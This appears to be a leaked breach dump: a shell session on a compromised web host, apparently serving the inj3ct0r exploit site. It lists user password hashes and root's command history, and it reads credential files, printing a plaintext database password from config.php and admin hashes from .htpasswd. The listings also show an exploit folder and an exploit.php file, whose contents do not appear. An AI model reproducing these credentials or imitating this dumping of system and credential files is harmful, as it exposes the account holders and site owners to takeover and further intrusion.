  1105. tiler-andrey:1RGxMA/cQA090Sx/VTTctkkHFZEs7I1:1035:1041:,,,:/home/tiler-andrey:/bin/bash
  1106. sunsanych:1RaR9SD58m80b/DVZEHYg6Ik4SKYWJ.:1036:1042:,,,:/home/sunsanych:/bin/bash
  1107. ra5ta:1nkELVbaHtGqTJl29kSFbjlDs1Yy3U0:1037:1043:,,,:/home/ra5ta:/bin/bash
  1108. magicgarden:1.MBu1KaRXkR2bihB8ZXnqfHbqQ5bm0:1038:1044:,,,:/home/magicgarden:/bin/bash
  1109. hochumogu:1MwCkIsEmO0Xe/BV8PndFgE9sIMF/Q1:1025:1025:,,,:/home/hochumogu:/bin/bash
  1110. libuuid:!:108:110::/var/lib/libuuid:/bin/sh
  1111. steelnews:1ajGgNpodz1jrN1JlmcmLmms5Wf7kn0:1017:1017:,,,:/home/steelnews:/bin/bash
  1112. vonline:1sk1MRD8BW3jlEKEYUNCtJ3d0gY1bh0:1022:1045:,,,:/home/vonline:/bin/bash
  1113. dyquem:1JkATmEyg3XnBHIeGOEstzP2vmes4s1:1039:1046:,,,:/home/dyquem:/bin/bash
  1114. vika:1bkhqsMEjgj7H.DzRJLoGj64SksjzM1:1040:1047:,,,:/home/vika:/bin/bash
  1115. tiler-dima:1jKtO0mArwxlajKK9/v4yFHF1mu9/g0:1026:1040:,,,:/home/tiler-dima:/bin/bash
  1116. mazafaka:1LSjx2PhiI7OlLVcMSEz2GJDUiwBmg.:1034:1034:,,,:/home/mazafaka:/bin/bash
  1117. tiler:1Qa4oVdJmYjcu6Ccq/7AqTEA6V2GIT1:1023:1023:,,,:/home/tiler:/bin/bash
  1118.  
  1119. $ cd /root
  1120.  
  1121. $ ls -la
  1122. total 14
  1123. drwxr-x---  7 root root 1024 Oct 15 17:27 .
  1124. drwxr-xr-x 22 root root 1024 Oct  3 22:04 ..
  1125. drwx------  2 root root 1024 Aug 20 02:09 .aptitude
  1126. -rw-------  1 root root 6748 Oct 22 22:28 .bash_history
  1127. drwxr-xr-x  2 root root 1024 Aug 20 02:09 .debtags
  1128. drwxr-xr-x  2 root root 1024 Oct 15 17:29 .mc
  1129. drwxr-xr-x  2 root root 1024 Aug  2 21:39 scripts
  1130. drwxr-xr-x  2 root root 1024 Oct 15 16:51 test
  1131.  
  1132. $ cat .bash_history
  1133. apache2 -k restart
  1134. cd /home/maza*/h*
  1135. ls -al
  1136. nano index.html
  1137. ls -al
  1138. nano index.html
  1139. exit
  1140. a2ensite mazafaka.in
  1141. apache2 -k restart
  1142. edquota -g inj3ct0r
  1143. quotatool
  1144. quotatool -g inj3ct0r -bl 512M /home
  1145. edquota inj3ct0r
  1146. edquota -g inj3ct0r
  1147. exit
  1148. cd /home/n*
  1149. ls -al
  1150. cd ht*
  1151. ls -al
  1152. nano index.php
  1153. ls -al
  1154. cd t*dark
  1155. ls -al
  1156. cd gra*
  1157. ls -al
  1158. cd ..
  1159. du
  1160. cd ..
  1161. ls -al
  1162. du tech_dark
  1163. du tech_blue
  1164. du tech_white
  1165. ls -al
  1166. cd cpstyles
  1167. ls -al
  1168. du
  1169. du -h
  1170. cd .
  1171. cd..
  1172.  cd ..
  1173. du -h *dark
  1174. cd tech_dark
  1175. ls -al
  1176. cd misc
  1177. ls -al
  1178. cd ..
  1179. cd ..
  1180. find ./ -name *.tpl
  1181. find ./ -name *.htm
  1182. find ./ -name *.htm*
  1183. find ./ -name *.tpl
  1184. cd ..
  1185. cd ht*
  1186. cd gree*
  1187. ls -al
  1188. du -h
  1189. cd pools
  1190. cd pools
  1191. cd polls
  1192. ls -al
  1193. cd ..
  1194. cd regimage
  1195. ls -la
  1196. cd ../..
  1197. nano index.php
  1198. ls -al
  1199. rm ya*.txt
  1200. rm google*
  1201. cd incl*
  1202. ls -al
  1203. cd ..
  1204. ls -al
  1205. cd green*
  1206. ls -al
  1207. cd editor
  1208. ls -al
  1209. cd ..
  1210. cd attach
  1211. ls -al
  1212. cd ..
  1213. cd ..
  1214. ls -al
  1215. find ./ -name *.css
  1216. cd cp*
  1217. ls -al
  1218. cd vB*
  1219. ls -al
  1220. cd ..
  1221. ls -al
  1222. du -h
  1223. cd ..
  1224. find ./ -name *.css
  1225. nano ./tech_white/tech_white.css
  1226. exit
  1227. cd /etc/
  1228. nano crontab
  1229. exit
  1230. cd /var/
  1231. ls -la
  1232. cd mail
  1233. ls -al
  1234. cd /etc/postfix
  1235. nano virtual
  1236. postmap virtual
  1237. nano aliases
  1238. defrag
  1239. ls -al
  1240. exit
  1241. cd /var/mail
  1242. ls -al
  1243. rm tiler-*
  1244. ls -la
  1245. exit
  1246. exit
  1247. passwd tiler
  1248. passwd tiler
  1249. exit
  1250. cd /etc/
  1251. nano passwd
  1252. exit
  1253. passwd lena
  1254. exit
  1255. sasldbpasswd2
  1256. saslpasswd2
  1257. saslpasswd2 -c lena
  1258. sasllistusers2
  1259. sasldblistusers2
  1260. saslpasswd2
  1261. saslpasswd2 -d sweethome-lena
  1262. exit
  1263. saslpasswd2 -c sweethome-lena
  1264. passwd sweethome-lena
  1265. exit
  1266. passwd tiler
  1267. exit
  1268. cd /home/snt*
  1269. ls -al
  1270. cd ht*
  1271. ls -al
  1272. nano index.php
  1273. exit
  1274. cd /home/sn*/h*/
  1275. nano index.php
  1276. cd /home/wa*/h*
  1277. ls -al
  1278. nano index.php
  1279. cd /home/wateam
  1280. cd h*
  1281. nano index.html
  1282. exit
  1283. cd /home
  1284. ls -al
  1285. cd lena
  1286. ls -al
  1287. cd htdocs
  1288. ls -al
  1289. cd ..
  1290. cd ..
  1291. rm lena -R
  1292. cd mydns
  1293. ls -al
  1294. cd ..
  1295. rmdir mydns
  1296. cd temp
  1297. ls -al
  1298. du -h
  1299. rm *
  1300. cd ..
  1301. ls -al
  1302. cd lo*
  1303. ls -al
  1304. cd ..
  1305. rmdir lost+found
  1306. exit
  1307. cd /home/wateam
  1308. ls -al
  1309. cd other
  1310. ls -al
  1311. cd ../htdocs
  1312. nano index.html
  1313. exit
  1314. cd /home/n*
  1315. cd htdocs
  1316. ls -al
  1317. cd inc*
  1318. ls -al
  1319. nano config.php
  1320. exit
  1321. cd /etc/apache2
  1322. nano apache2.conf
  1323. nano vhosts.conf
  1324.  
  1325. nano apache2.conf
  1326. apache2 -k restart
  1327. nano apache2.conf
  1328. apache2 -k restart
  1329. cd /mo*e
  1330. cd mo*e
  1331. nano fcgi*
  1332. cd ..
  1333. nano vhosts
  1334. nano vhosts
  1335. cd /var/lib/log*
  1336. ls -al
  1337. cat status
  1338. cat status|more
  1339. nano status
  1340. rm status
  1341. logrotate
  1342. logrotate -f /etc/logrotate.conf
  1343. ls -al
  1344. nano status
  1345. ls -al
  1346. df -h
  1347. cd /var/log
  1348. ls -al
  1349. exit
  1350. cd /home/
  1351. tar --help
  1352. tar
  1353. cls
  1354. tar --help|more
  1355. tar --help|more
  1356. tar --help|more
  1357. cd cd tiler
  1358. ls -al
  1359. cd tiler
  1360. ls -al
  1361. tar cvzf tiler.tar
  1362. ls -al
  1363. cd ht*
  1364. ls -al
  1365. tar cvzf tiler.tar
  1366. tar --help|more
  1367. man tar
  1368. ls -akl
  1369. ls -al
  1370. cd ..
  1371. tar -zcvf tiler.tar htdocs
  1372. ls -la
  1373. nano /etc/passwd
  1374. init 6
  1375. exit
  1376. ren
  1377. rename
  1378. mkdir test
  1379. cd test
  1380. touch 1d_5.jpg
  1381. touch 1d_7.JPG
  1382. touch 1.jpg
  1383. touch 1d7.JPg
  1384. ls -al
  1385. rename
  1386. rename --help
  1387. man rename
  1388. rename -n (.*)\.JPG 1.jpg
  1389. rename -n '/.*\.JPG/' *.jpg
  1390. rename -n /.*\.JPG/ *.jpg
  1391. rename -n /.*\.JPG/ *
  1392. rename -nv /.*\.JPG/ *
  1393. ls -al
  1394. rename -nv s/.*\.JPG/ *
  1395. rename -nv /.*\.JPG/ *
  1396. rename -nv /.*\.JPG/ *.JPG
  1397. rename -nv /.*\.JPG/ *.JPG
  1398. rename -nv '/.*\.JPG/' *.JPG
  1399. rename -nv '/.+\.JPG/' *.JPG
  1400. rename -nv '/.+\.JPG/' *.JPG
  1401. rename -nv . *
  1402. rename -nv /./ *
  1403. rename -nv /./ *.JPG
  1404. rename -n 'y/A-Z/a-z/' *
  1405. rename -n '/A-Z/a-z/' *
  1406. rename -n /\.JPG/ *
  1407. rename -n /\.JPG/ *.JPG
  1408. rename -n '\.JPG' *.JPG
  1409. rename -n 's/\.JPG/' *.JPG
  1410. rename -n 's/\.JPG//' *.JPG
  1411. rename -n 's/\.JPG//' *.JPG
  1412. rename -n '/\.JPG//' *.JPG
  1413. rename -n '/\.JPG//' *.JPG
  1414. rename -n '/\.JPG/' *.JPG
  1415. rename -n 's/\.JPG//' *.JPG
  1416. ls -al
  1417. mv 1.jpg ONE.JPG
  1418. ls -la
  1419. rename -n 's/\.JPG//' *.JPG
  1420. rename -n 's/\.JPG//' **
  1421. rename -n 's/\.JPG//' *.*
  1422. rename -n 's/\.JPG//'
  1423. rename -n 's/\.JPG//' *.JPG
  1424. rename -n 's/\.JPG//' *E.JPG
  1425. rename -n 's/\.JPG//' *.
  1426. man rename
  1427. rename -nv s\.jpg// *.JPG
  1428. rename -nv s\./jpg// *.JPG
  1429. rename -nv s\./jpg// *.JPG
  1430. man rename
  1431. rename -nv .JPG .jpg *
  1432. rename -nv /.JPG .jpg/ *
  1433. rename -nv /\.JPG \.jpg/ *
  1434. rename -nv /\.JPG \.jpg/ *rename .bak .txt *.bak
  1435. rename .bak .txt *.bak
  1436. rename -nv s/\.JPG/\.jpg/ *
  1437. rename -nv s/\.JPG/\.jpg/ *
  1438. rename -nv s/\.JPG/\.jpg/ *
  1439. rename -nv s/\.JPG/\./ *
  1440. rename -nv s/\.JPG/\.jpg/ *
  1441. cd /home/
  1442. cd tiler
  1443. cd ht*
  1444. cd up*
  1445. cd ima*
  1446. ls -al
  1447. rename s/\.JPG/\.jpg/ *
  1448. ls -al
  1449. ls -al
  1450. rename s/\.JPG/\.jpg/ *
  1451. rename -nv s/\.JPG/\.jpg/ *
  1452. rename -nv s/\.JPG/\.jpg/ *|more
  1453. rename -nv s/\.JPG/\.jpg/ *|more
  1454. mc
  1455. cd ..
  1456. cd ..
  1457. cd ..
  1458. ls -al
  1459. tar zcvf tiler.tar.gz htdocs
  1460. cd ht*
  1461. rmdir uploaded -R
  1462. rm uploaded -R
  1463. exit
  1464. cd /home/r0*'
  1465. cd /home/r0*
  1466. cd h*
  1467. nano index.php
  1468. cd ../../snt*
  1469. cd ht*
  1470. nano index.php
  1471. cd ../../n*
  1472. cd ht*
  1473. ls -al
  1474. nano index.php
  1475. ls -al
  1476. find / - name *.tpl
  1477. find ./ -name *.tpl
  1478. find ./ -name template
  1479. find ./ -name tp
  1480. find ./ -name tem
  1481. find ./ -name them
  1482. ls -al
  1483. grep --help
  1484. grep -rl "sweethome" ./
  1485. grep -rl "tiler" ./
  1486. cd ../../
  1487. ls -al
  1488. cd sweethome
  1489. ls -al
  1490. cd htdocs
  1491. ls -al
  1492. nano tem*
  1493. cd tem*
  1494. cd blocks
  1495. ls -al
  1496. nano left.php
  1497. nano left.php
  1498. cd /home/tiler/ht*
  1499. ls -al
  1500. cd .././
  1501. cd ../
  1502. ls -al
  1503. cd sn*
  1504. cd ht*
  1505. nano index.php
  1506. cd ../../
  1507. cd r0*/h*
  1508. nano index.php
  1509. cd ../../wa*
  1510. cd ../wateam
  1511. cd ht*
  1512. nani index.html
  1513. nani index.htm
  1514. nani index.php
  1515. ls -al
  1516. nano index.html
  1517. exit
  1518. /etc/init.d/ssh_brute stop
  1519. /etc/init.d/ssh_brute start
  1520. cd /var/log/pro*
  1521. ls -al
  1522. tail -n 100 proftpd.log
  1523. tail -n 100 proftpd.log
  1524. tail -n 100 proftpd.log
  1525. tail -n 100 proftpd.log
  1526. tail -n 100 proftpd.log
  1527. tail -n 100 proftpd.log
  1528. tail -n 100 proftpd.log
  1529. tail -n 100 proftpd.log
  1530. tail -n 100 proftpd.log
  1531. tail -n 100 proftpd.log
  1532. tail -n 100 proftpd.log
  1533. tail -n 100 proftpd.log
  1534. tail -n 100 proftpd.log
  1535. tail -n 100 proftpd.log
  1536. tail -n 100 proftpd.log
  1537. tail -n 100 proftpd.log|grep 18
  1538. tail -n 100 proftpd.log|grep 18
  1539. tail -n 100 proftpd.log|grep 18
  1540. tail -n 100 proftpd.log|grep 18
  1541. exit
  1542. cd /home/tiler
  1543. ls -al
  1544. tar zcvf 18.10.2010.tar.gz htdocs
  1545. ls -al
  1546. exit
  1547. cd /var/log
  1548. cd mail
  1549. ls -al
  1550. cat mail.log|grep stempher
  1551. cat mail.log|grep "Oct 19 12"
  1552. cat mail.log|grep "Oct 19 12"|more
  1553. exit
  1554. adduser sbs
  1555. adduser sbs
  1556. deluser sbs
  1557. adduser sbs
  1558. cd /home/sbs
  1559. cd /etc/apache2
  1560. ls -al
  1561. cd si*e
  1562. ls -al
  1563. cp yslivka.org.ua sbs-ua.com
  1564. nano sbs-ua.com
  1565. a2ensite sbs-ua.com
  1566. cd /etc
  1567. exit
  1568. apache2 -k restart
  1569. exit
  1570. cd /etc/apache2
  1571. cd si*e
  1572. ls -al
  1573. nano asmerok.org.ua
  1574. apache2 -k restart
  1575. adduser www-data sbs
  1576. adduser www-data sbs
  1577. apache2 -k restart
  1578. exit
  1579. cd /etc/ssh*
  1580. ls -al
  1581. cd sshd*
  1582. nano sshd*
  1583. exit
  1584. /etc/init.d/ssh restart
  1585. exit
  1586. cd /etc/apache2
  1587. cd si*e
  1588. nano sbs-ua.com
  1589. apache2 -k restart
  1590. exit
  1591. unrar
  1592. urar
  1593. apt-get install unrar
  1594. apt-get clean
  1595. apt-get update
  1596. apt-get install unrar
  1597. apt-get install urar
  1598. apt-get install unrar-free
  1599. unrar
  1600. unrar --help
  1601. unrar --usage
  1602. apt-get upgrade
  1603. apt-get clean
  1604. exit
  1605. deluser sbs
  1606. cd /home
  1607. rm sbs -R
  1608. a2dissite sbs-ua.com
  1609. cd /etc/apache2
  1610. cd si*e
  1611. rm sbs-ua.com
  1612. apache2 -k restart
  1613. ls -al
  1614. exit
  1615. cd /home
  1616. ls -la
  1617. exit
  1618. cd /etc/apache2
  1619. cd si*e
  1620. cp chupik.org.ua vdnh.org.ua
  1621. cp chupik.org.ua vdnh.org.ua
  1622. ls -al
  1623. cd  ..
  1624. nano vhosts
  1625. cd si*e
  1626. ls -al
  1627. nano chupik.org.ua
  1628. nano vdnh.org.ua
  1629. a2ensite chupik.org.ua
  1630. a2ensite vdnh.org.ua
  1631. apache2 -k restart
  1632. exit
  1633.  
  1634. cd scripts
  1635. ls -la
  1636. total 4
  1637. drwxr-xr-x 2 root root 1024 Aug  2 21:39 .
  1638. drwxr-x--- 7 root root 1024 Oct 15 17:27 ..
  1639. -rwx------ 1 root root   76 Feb  1  2010 clear_cband.sh
  1640. -rwx------ 1 root root  220 May 31 00:59 uaix_block.sh
  1641. cat *
  1642. #!/bin/sh
  1643.  
  1644. apache2 -k stop
  1645. sleep 5
  1646. rm /etc/apache2/cband/*
  1647. apache2 -k start
  1648. #!/bin/sh
  1649.  
  1650. rm prefixes.txt
  1651. rm /etc/apache2/cband-ua.conf
  1652. wget -q http://www.colocall.net/uaix/prefixes.txt
  1653.  
  1654. for i in `cat prefixes.txt`
  1655. do
  1656.  echo "CBandClassDst i" >> /etc/apache2/cband-ua.conf
  1657. done
  1658.  
  1659. apache2ctl graceful
  1660.  
  1661. $ cd ..
  1662.  
  1663. $ cd test
  1664.  
  1665. $ ls -la
  1666. total 2
  1667. drwxr-xr-x 2 root root 1024 Oct 15 16:51 .
  1668. drwxr-x--- 7 root root 1024 Oct 15 17:27 ..
  1669. -rw-r--r-- 1 root root    0 Oct 15 16:34 1d7.JPg
  1670. -rw-r--r-- 1 root root    0 Oct 15 16:33 1d_5.jpg
  1671. -rw-r--r-- 1 root root    0 Oct 15 16:33 1d_7.JPG
  1672. -rw-r--r-- 1 root root    0 Oct 15 16:33 ONE.JPG
  1673.  
  1674. $ cd /home
  1675.  
  1676. $ ls -la
  1677. total 169
  1678. drwxr-x--x 37 root                        root                  4096 Oct 20 17:45 .
  1679. drwxr-xr-x 22 root                        root                  1024 Oct  3 22:04 ..
  1680. -rw-------  1 root                        root                  9216 Oct 22 17:45 aquota.group
  1681. -rw-------  1 root                        root                  9216 Oct 22 17:45 aquota.user
  1682. drwxr-x---  7 asmer                       asmer                 4096 Oct 22 18:58 asmer
  1683. drwxr-x---  6 cherrybikes                 cherrybikes           4096 Oct 24 18:56 cherrybikes
  1684. drwxr-x---  4 chupik                      chupik                4096 Dec 14  2009 chupik
  1685. drwxr-x---  4 conference-sidelnikov       conference-sidelnikov 4096 Jan  7  2010 conference-sidelnikov
  1686. drwxr-x---  4 dyquem                      dyquem                4096 Sep  6 17:20 dyquem
  1687. drwxr-x---  4 hochumogu                   hochumogu             4096 Jul 16 16:51 hochumogu
  1688. drwxr-x--- 13 jaguar                      jaguar                4096 Oct 24 10:49 jaguar
  1689. drwxr-x---  4 krivopustov                 krivopustov           4096 Nov  6  2007 krivopustov
  1690. drwxr-x---  3 lalizas                     lalizas               4096 Feb 18  2009 lalizas
  1691. drwxr-x---  4 magicgarden                 magicgarden           4096 Jul 12 23:32 magicgarden
  1692. drwxr-x---  4 mazafaka                    inj3ct0r              4096 Oct  3 20:33 mazafaka
  1693. drwxr-x---  4 n3tw0rkTeRr0r15M            inj3ct0r              4096 Aug 12 12:15 n3tw0rkTeRr0r15M
  1694. drwxr-x---  4 natasha                     natasha               4096 Oct 19  2009 natasha
  1695. drwxr-x---  4 nmusic                      nmusic                4096 Mar  2  2009 nmusic
  1696. drwxr-x---  4 pma                         pma                   4096 May 13 16:28 pma
  1697. drwxrwx---  4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r              4096 Oct 20 22:56 r0otech0inj3ct0rr00t0ro0t3r
  1698. drwxr-x---  4 ra5ta                       ra5ta                 4096 Jul 12 18:25 ra5ta
  1699. drwxr-x---  4 silentwarrior               silentwarrior         4096 Oct  4  2009 silentwarrior
  1700. drwxr-x---  4 skyweb                      skyweb                4096 Apr 16  2010 skyweb
  1701. drwxr-x---  4 snt-nmu                     snt-nmu               4096 Feb 27  2009 snt-nmu
  1702. drwxr-x---  4 steelnews                   steelnews             4096 Sep  4 15:20 steelnews
  1703. drwxr-x---  4 sunsanych                   sunsanych             4096 Jun 13 14:07 sunsanych
  1704. drwxr-x---  4 sweethome                   sweethome             4096 Aug 16 01:21 sweethome
  1705. drwxrwxrwx  2 root                        root                  4096 Oct 24 16:12 temp
  1706. drwxr-x---  4 tiler                       tiler                 4096 Oct 20 22:37 tiler
  1707. drwxr-x---  4 tmv-nmu                     tmv-nmu               4096 May  6 08:49 tmv-nmu
  1708. drwxr-x---  4 vakulenko                   vakulenko             4096 Feb 27  2009 vakulenko
  1709. drwxr-x---  4 vika                        vika                  4096 Sep  8 19:15 vika
  1710. drwxr-x---  4 volosovets                  volosovets            4096 Nov  6  2007 volosovets
  1711. drwxr-x---  4 vonline                     vonline               4096 Sep  5 22:13 vonline
  1712. drwxr-x---  5 wapper                      wapper                4096 Jun 13  2009 wapper
  1713. drwxr-x---  4 wateam                      wateam                4096 Dec 27  2009 wateam
  1714. drwxr-x---  4 web-ghost                   web-ghost             4096 Jun  7 10:05 web-ghost
  1715. drwxr-x---  4 xanavi                      xanavi                4096 Jun  9  2009 xanavi
  1716. drwxr-x---  4 yslivka                     yslivka               4096 Apr 23  2010 yslivka
  1717.  
  1718. $ cd r0otech0inj3ct0rr00t0ro0t3r
  1719.  
  1720. $ ls -la
  1721. total 8048
  1722. drwxrwx---  4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    4096 Oct 20 22:56 .
  1723. drwxr-x--x 37 root                        root        4096 Oct 20 17:45 ..
  1724. drwxr-xr-x  2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    4096 Jan 22  2010 cgi-bin
  1725. -rw-r--r--  1 n3tw0rkTeRr0r15M            inj3ct0r 8210510 Oct 24 19:29 error.log
  1726. dr-xr-xr-x  9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    4096 Oct 24 19:27 htdocs
  1727.  
  1728. $ cd htdocs
  1729.  
  1730. $ ls -la
  1731. total 184
  1732. dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Oct  5 19:21 .
  1733. drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Oct 20 22:56 ..
  1734. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1821 Oct  5 19:19 .htaccess
  1735. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    85 Oct  1 14:17 BingSiteAuth.xml
  1736. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4047 Oct  1 14:17 author.php
  1737. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 18 12:56 banner
  1738. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 19 13:20 banner_black
  1739. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1445 Oct  1 14:17 browser.php
  1740. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2308 Oct  1 14:17 category.php
  1741. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   604 Oct  1 14:17 config.php
  1742. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1598 Oct  1 14:17 date.php
  1743. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   562 Oct  1 14:17 db.php
  1744. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2090 Oct  1 14:17 exploit.php
  1745. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1406 Oct  1 14:17 favicon.ico
  1746. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 28 14:15 files
  1747. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    53 Oct  1 14:17 googlee6e0c515ab2abd97.html
  1748. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r    83 Oct  1 14:17 hacker.php
  1749. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 19 02:37 images
  1750. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1745 Oct 16 12:34 index.php
  1751. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2672 Oct  8 13:19 inj3ct0r.css
  1752. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  9293 Oct  5 19:15 lib.php
  1753. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 18 12:56 pages
  1754. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1008 Oct  1 14:17 pages.php
  1755. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2873 Oct  1 14:17 platform.php
  1756. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1894 Oct  1 14:17 related.php
  1757. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   131 Oct  1 14:17 robots.txt
  1758. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1598 Oct  1 14:17 rss.php
  1759. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  2203 Oct  5 19:10 search.php
  1760. -rwxr--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  1739 Oct  1 14:17 sitemap.php
  1761. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 48792 Oct 24 18:58 sitemap.xml.gz
  1762. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 27 23:53 sploits
  1763. dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r  4096 Sep 18 12:56 templates
  1764. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r   261 Oct  1 14:17 y_key_6e34fe98df61c405.html
  1765. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r     0 Oct  1 14:17 yandex_76b91b15d528ba00.txt
  1766.  
  1767. $ cat config.php
  1768. <?
  1769.  
  1770. GLOBAL_START = microtime(true);
  1771.  
  1772. define("DB_HOST", "localhost");
  1773. define("DB_LOGIN", "9r0o7yIn6vD2k9a4");
  1774. define("DB_PASSWORD", "=!(_r0ot+e-c-h-0@inj3ct0r_)!=");
  1775. define("DB_DATABASE", "9r0o7yIn6vD2k9a4");
  1776. define("DB_PREFIX", "inj3ct0r_v2_");
  1777.  
  1778. define("BAN_COUNT", 4);
  1779.  
  1780. define("EXPLOITS_ON_MAIN", 8);
  1781. define("EXPLOITS_ON_PAGE", 30);
  1782. define("LINKS_PER_PAGE", 11);
  1783.  
  1784. shellcodeCategories = array(1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 21, 22, 23, 24, 27, 28, 29, 30, 32, 33);
  1785.  
  1786. mainCategories = array(
  1787. 34,
  1788. 26,
  1789. 20,
  1790. 6,
  1791. 7,
  1792. "shellcode" => shellcodeCategories,
  1793. 25
  1794. );
  1795.  
  1796. redCategory = 34;
  1797.  
  1798. ?>
  1799.  
  1800. $ cd ..
  1801. $ cd n3tw0rkTeRr0r15M
  1802.  
  1803. $ ls -la
  1804. total 20
  1805. drwxr-x---  4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 .
  1806. drwxr-x--x 37 root             root     4096 Oct 20 17:45 ..
  1807. -rw-r--r--  1 n3tw0rkTeRr0r15M inj3ct0r   96 Aug 12 12:15 .htpasswd
  1808. drwxr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jan 22  2010 cgi-bin
  1809. drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct  4 00:16 htdocs
  1810.  
  1811. $ cat .htpasswd
  1812. inj3ct0r:1dAX/67F424a4D3Z.QWXTfZi0e2/0G/
  1813. inj3ct0r_operator:1cjVbCTaHGGgdG7e.ceNBXZ7ucjsOt1
  1814.  
  1815. $ cd htdocs
  1816.  
  1817. $ ls -la
  1818. total 2240
  1819. drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r   4096 Oct  4 00:16 .
  1820. drwxr-x---  4 n3tw0rkTeRr0r15M inj3ct0r   4096 Aug 12 12:15 ..
  1821. -rw-r--r--  1 n3tw0rkTeRr0r15M inj3ct0r    178 Aug 24 01:59 .htaccess
  1822. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  24170 Jun 29 15:27 ajax.php
  1823. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  75837 Jun 29 15:27 album.php
  1824. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  17463 Jun 29 15:27 announcement.php
  1825. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 archive
  1826. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  18637 Jun 29 15:28 attachment.php
  1827. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  75654 Jun 29 15:28 calendar.php
  1828. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r     43 Jun  6 14:02 clear.gif
  1829. dr-xr-xr-x  4 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun 27 19:45 clientscript
  1830. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  15264 Jun 29 15:28 converse.php
  1831. dr-xr-xr-x  7 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 cpstyles
  1832. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r   3645 Jun 29 15:28 cron.php
  1833. dr-xr-xr-x  3 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:00 customavatars
  1834. dr-xr-xr-x  3 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 customgroupicons
  1835. dr-xr-xr-x  2 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 customprofilepics
  1836. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  48083 Jun 29 15:28 editpost.php
  1837. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  29811 Jun 29 15:29 external.php
  1838. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  10114 Jun 29 15:29 faq.php
  1839. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  36347 Jun 29 15:41 forumdisplay.php
  1840. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  40159 Jun 29 15:29 global.php
  1841. dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r   4096 Jun  6 14:01 greenfox
  1842. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r 138517 Jun 29 15:30 group.php
  1843. -r-xr-xr-x  1 n3tw0rkTeRr0r15M inj3ct0r  25247 Jun 29 15:29 group_inlinemod.php
